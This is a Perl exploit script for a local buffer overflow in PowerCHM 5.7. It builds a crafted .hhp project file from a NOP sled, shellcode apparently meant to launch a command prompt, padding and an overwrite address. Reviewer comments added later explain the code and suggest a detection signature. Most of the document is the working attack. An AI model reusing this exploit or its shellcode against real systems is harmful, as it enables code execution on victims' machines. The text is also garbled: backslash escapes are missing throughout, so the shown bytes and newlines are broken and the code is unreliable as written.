
# Title : PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
# Published : 2009-03-29
# Author : LiquidWorm


#!/usr/bin/perl
#
# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
#
# Summary: With PowerCHM you can create your CHM files
# automatically from Html Files (including .htm, .html
# and .mht), Text Files (.txt), Microsoft Word Documents
# (.doc) and Adobe Acrobat Document (.pdf).
#
# Product web page: http://www.dawningsoft.com/products/powerchm.htm
#
# Tested on WinXP Pro SP2 (English)
#
# Refs:	http://www.milw0rm.com/exploits/8300
#	http://security.biks.vn/?p=365
#
# Exploit by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 28.03.2009
#

# Script body: build a fixed HHP project header plus an oversized trailer
# and write both to Watchmen.hhp in the current directory.
#
# The file runs without `use strict; use warnings;`, so the bareword
# filehandle and unchecked close below are never diagnosed.
#
# NOTE(review): as displayed on this page the trailing "n" characters and the
# "x.." tokens are literal ASCII text; presumably an escape character was lost
# in the page rendering. The literals are reproduced here byte-for-byte and
# deliberately not "repaired".

# HHP project header: [OPTIONS], [WINDOWS], [FILES] and [INFOTYPES] sections,
# indented with a leading tab on every line (the tabs are part of the string).
my $header="
	[OPTIONS]n
	Compatibility=1.1 or latern
	Compiled file=zero.chmn
	Contents file=science.hhcn
	Index file=lqwrm.hhkn
	Binary Index=Yesn
	Language=0x042Fn
	Title=n
	Error log file=Errlog.txtn
	Default Window=mainnn
	[WINDOWS]n
	main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0nn
	[FILES]nn
	[INFOTYPES]n
	";


# Trailer fragment spliced into the middle of $bof (see below). Three
# concatenated string literals; as shown, plain ASCII.
my $sc ="x8BxECx33xFFx57xC6x45xFCx63xC6x45".
	"xFDx6DxC6x45xFEx64xC6x45xF8x01x8D".
	"x45xFCx50xB8xC7x93xBFx77xFFxD0";


# Oversized field appended after [INFOTYPES]: 568 repeats of "x90", then $sc,
# 400 repeats of "x41", one fixed token, then 500 repeats of "x42".
# `"$sc"` merely interpolates the scalar into a new string (same as `$sc`).
# Detection angle: a legitimate project file keeps its sections short; a
# multi-kilobyte run of repeated characters directly after the last section
# header is an easy content signature for files of this type.
my $bof = "x90" x 568 . "$sc" . "x41" x 400 . "xe8xedx12x00" . "x42" x 500;

# Output path, relative to the current working directory.
my $file = "Watchmen.hhp";
# Two-argument open with a bareword handle: the mode (">") is carried inside
# the filename string. The name is a fixed constant here, so there is no
# mode-injection risk in this script, but the idiomatic form is
# `open my $fh, '>', "./$file" or die ...`. The `||` is fine here only because
# the parenthesised argument list makes `open(...)` a complete call.
open (hhp, ">./$file") || die "nCan't open $file: $!";
# Header first, then the oversized trailer; interpolating the scalars into
# double-quoted strings is redundant but harmless.
print hhp "$header" . "$bof";
# Unchecked close: a buffered write failure would go unnoticed here.
close (hhp);
# Cosmetic pause before the status line; no functional role is visible.
sleep 1;
print "nFile $file successfully created!n";
